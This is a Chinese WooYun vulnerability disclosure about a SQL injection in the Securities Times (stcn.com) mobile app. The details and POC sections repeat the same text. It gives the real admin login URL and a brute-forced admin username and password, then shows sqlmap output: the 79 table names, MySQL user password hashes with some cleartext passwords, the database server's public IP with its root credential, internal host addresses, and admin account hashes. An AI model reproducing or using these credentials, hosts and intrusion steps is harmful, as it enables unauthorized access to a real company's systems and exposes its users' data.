证券时报APPSQ注入影响所有注册用户

编号215855
Urlhttp://www.wooyun.org/bug.php?action=view&id=215855
漏洞状态厂商已经确认
漏洞标题证券时报APPSQ注入影响所有注册用户
漏洞类型SQL注射漏洞
厂商stcn.com
白帽子艺术家
提交日期2016-06-03 16:23:00
公开日期2016-07-18 16:50:00
修复时间(not set)
确认时间2016-06-03 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank20
漏洞简介
RT
漏洞细节

WooYun: 证券时报某漏洞(涉及APP/数据库/证券/股票走势等)
根据这个漏洞说的。可以得到APP管理后台,其实也不用,大可以在APP中找到。
http://appzd.zxzx.stcn.com/admin/admin/adminLogin.do
这里
爆破一下用户名,验证码有问题。直接爆破成功。

lidongping  123456


登录进去。

1.png


找到SQL:

back-end DBMS: MySQL 5.0
Database: zhengquanshibaoapp
[79 tables]
+-----------------------------------------+
| bt_config |
| bt_rights |
| t_admin |
| t_banner |
| t_blocks |
| t_category |
| t_category_common |
| t_combination |
| t_combination_common |
| t_combination_favorite |
| t_combination_read |
| t_common |
| t_common_prev |
| t_favorable |
| t_favorable_category |
| t_folder |
| t_folder_rights |
| t_identity |
| t_identity_role |
| t_message |
| t_message_user |
| t_new_case |
| t_newcase_read |
| t_order |
| t_orderItem |
| t_region |
| t_role |
| t_role_rights |
| t_socket_news |
| t_symbol |
| t_tencentpost |
| t_token |
| t_user |
| t_user_category |
| t_user_device |
| t_user_track_Spider |
| t_user_track_lyc |
| t_v_combinationfavorite |
| test_c3p0 |
| v_t_admin |
| v_t_app_user_order_category |
| v_t_article_category |
| v_t_blocks_admin |
| v_t_blocks_category |
| v_t_category_common_block |
| v_t_category_common_combination_commmon |
| v_t_category_favorable |
| v_t_combination_category |
| v_t_combination_category_all |
| v_t_combination_category_all_app |
| v_t_combination_category_user |
| v_t_combination_common |
| v_t_combination_common_category |
| v_t_combination_common_top |
| v_t_combination_preview |
| v_t_combination_read |
| v_t_combination_read_app |
| v_t_combination_user_read |
| v_t_common_admin |
| v_t_common_category_admin |
| v_t_common_prev_admin |
| v_t_config_admin |
| v_t_folder_rights |
| v_t_folder_rights_role |
| v_t_message_admin |
| v_t_message_no_user |
| v_t_message_user |
| v_t_message_user_admin |
| v_t_message_user_admin_sta |
| v_t_order_orderItem |
| v_t_order_orderitem |
| v_t_role_identity |
| v_t_role_rights_menu |
| v_t_statistics |
| v_t_symbol_admin |
| v_t_user_device_info |
| v_t_user_order_category |
| v_t_user_order_orderItem |
| v_t_user_region |
+-----------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind


跑出
database management system users password hashes:
[*] readonly [1]:
password hash: NULL
[*] root [5]:
password hash: *39581AB63696F01812388F6F9A9D2E47CB29ABB2
password hash: *A600763916E936C01BCBE0E4136574F3C4E3E5CD
password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2 *****
password hash: *FD5953C1B8CF02528A1577028DFF6244116087DE fo9iU1
password hash: NULL
[*] user1 [1]:
password hash: NULL
[*] zqsb_app [1]:
password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2
[*] zqsbapp [3]:
password hash: *39581AB63696F01812388F6F9A9D2E47CB29ABB2
password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2
password hash: *F352D2FDFB850B4CC196D08DD822ADD5CFD2BB42
之前数据库密码
Quattro!
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'readonly'@'121.15.5.177'
[*] 'root'@'115.29.185.90' *
[*] 'root'@'121.15.5.177'
[*] 'root'@'127.0.0.1'
[*] 'root'@'172.18.10.73'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
[*] 'user1'@'121.15.139.172'
[*] 'user1'@'121.15.5.177'
[*] 'zqsb_app'@'121.15.5.177'
[*] 'zqsbapp'@'127.0.0.1'
[*] 'zqsbapp'@'192.168.10.29'
[*] 'zqsbapp'@'192.168.10.53'
数据库密码。得到数据库的地址为
115.29.185.90
账号为root
密码为B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2
账号:
liuyufeng e24d3a6718be9dd73a94a3277c8ee6fa
hemin 143e4ff1b57893f8a62fb729cfa187f6
进入后台:

3.png


4.png


6.png


影响APP所有用户。

POC

WooYun: 证券时报某漏洞(涉及APP/数据库/证券/股票走势等)
根据这个漏洞说的。可以得到APP管理后台,其实也不用,大可以在APP中找到。
http://appzd.zxzx.stcn.com/admin/admin/adminLogin.do
这里
爆破一下用户名,验证码有问题。直接爆破成功。

lidongping  123456


登录进去。

1.png


找到SQL:

back-end DBMS: MySQL 5.0
Database: zhengquanshibaoapp
[79 tables]
+-----------------------------------------+
| bt_config |
| bt_rights |
| t_admin |
| t_banner |
| t_blocks |
| t_category |
| t_category_common |
| t_combination |
| t_combination_common |
| t_combination_favorite |
| t_combination_read |
| t_common |
| t_common_prev |
| t_favorable |
| t_favorable_category |
| t_folder |
| t_folder_rights |
| t_identity |
| t_identity_role |
| t_message |
| t_message_user |
| t_new_case |
| t_newcase_read |
| t_order |
| t_orderItem |
| t_region |
| t_role |
| t_role_rights |
| t_socket_news |
| t_symbol |
| t_tencentpost |
| t_token |
| t_user |
| t_user_category |
| t_user_device |
| t_user_track_Spider |
| t_user_track_lyc |
| t_v_combinationfavorite |
| test_c3p0 |
| v_t_admin |
| v_t_app_user_order_category |
| v_t_article_category |
| v_t_blocks_admin |
| v_t_blocks_category |
| v_t_category_common_block |
| v_t_category_common_combination_commmon |
| v_t_category_favorable |
| v_t_combination_category |
| v_t_combination_category_all |
| v_t_combination_category_all_app |
| v_t_combination_category_user |
| v_t_combination_common |
| v_t_combination_common_category |
| v_t_combination_common_top |
| v_t_combination_preview |
| v_t_combination_read |
| v_t_combination_read_app |
| v_t_combination_user_read |
| v_t_common_admin |
| v_t_common_category_admin |
| v_t_common_prev_admin |
| v_t_config_admin |
| v_t_folder_rights |
| v_t_folder_rights_role |
| v_t_message_admin |
| v_t_message_no_user |
| v_t_message_user |
| v_t_message_user_admin |
| v_t_message_user_admin_sta |
| v_t_order_orderItem |
| v_t_order_orderitem |
| v_t_role_identity |
| v_t_role_rights_menu |
| v_t_statistics |
| v_t_symbol_admin |
| v_t_user_device_info |
| v_t_user_order_category |
| v_t_user_order_orderItem |
| v_t_user_region |
+-----------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind


跑出
database management system users password hashes:
[*] readonly [1]:
password hash: NULL
[*] root [5]:
password hash: *39581AB63696F01812388F6F9A9D2E47CB29ABB2
password hash: *A600763916E936C01BCBE0E4136574F3C4E3E5CD
password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2 *****
password hash: *FD5953C1B8CF02528A1577028DFF6244116087DE fo9iU1
password hash: NULL
[*] user1 [1]:
password hash: NULL
[*] zqsb_app [1]:
password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2
[*] zqsbapp [3]:
password hash: *39581AB63696F01812388F6F9A9D2E47CB29ABB2
password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2
password hash: *F352D2FDFB850B4CC196D08DD822ADD5CFD2BB42
之前数据库密码
Quattro!
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'readonly'@'121.15.5.177'
[*] 'root'@'115.29.185.90' *
[*] 'root'@'121.15.5.177'
[*] 'root'@'127.0.0.1'
[*] 'root'@'172.18.10.73'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
[*] 'user1'@'121.15.139.172'
[*] 'user1'@'121.15.5.177'
[*] 'zqsb_app'@'121.15.5.177'
[*] 'zqsbapp'@'127.0.0.1'
[*] 'zqsbapp'@'192.168.10.29'
[*] 'zqsbapp'@'192.168.10.53'
数据库密码。得到数据库的地址为
115.29.185.90
账号为root
密码为B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2
账号:
liuyufeng e24d3a6718be9dd73a94a3277c8ee6fa
hemin 143e4ff1b57893f8a62fb729cfa187f6
进入后台:

3.png


4.png


6.png


影响APP所有用户。

修复方案

状态信息 2016-06-03: 细节已通知厂商并且等待厂商处理中
2016-06-03: 厂商已经确认,细节仅向厂商公开
2016-06-13: 细节向核心白帽子及相关领域专家公开
2016-06-23: 细节向普通白帽子公开
2016-07-03: 细节向实习白帽子公开
2016-07-18: 细节向公众公开
厂商回复请不要公开,我们正在修复
回应信息危害等级:高漏洞Rank:20 确认时间:2016-06-03 16:45
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

请不要公开,我们正在修复

骑虎打狗02016-06-03 16:48:00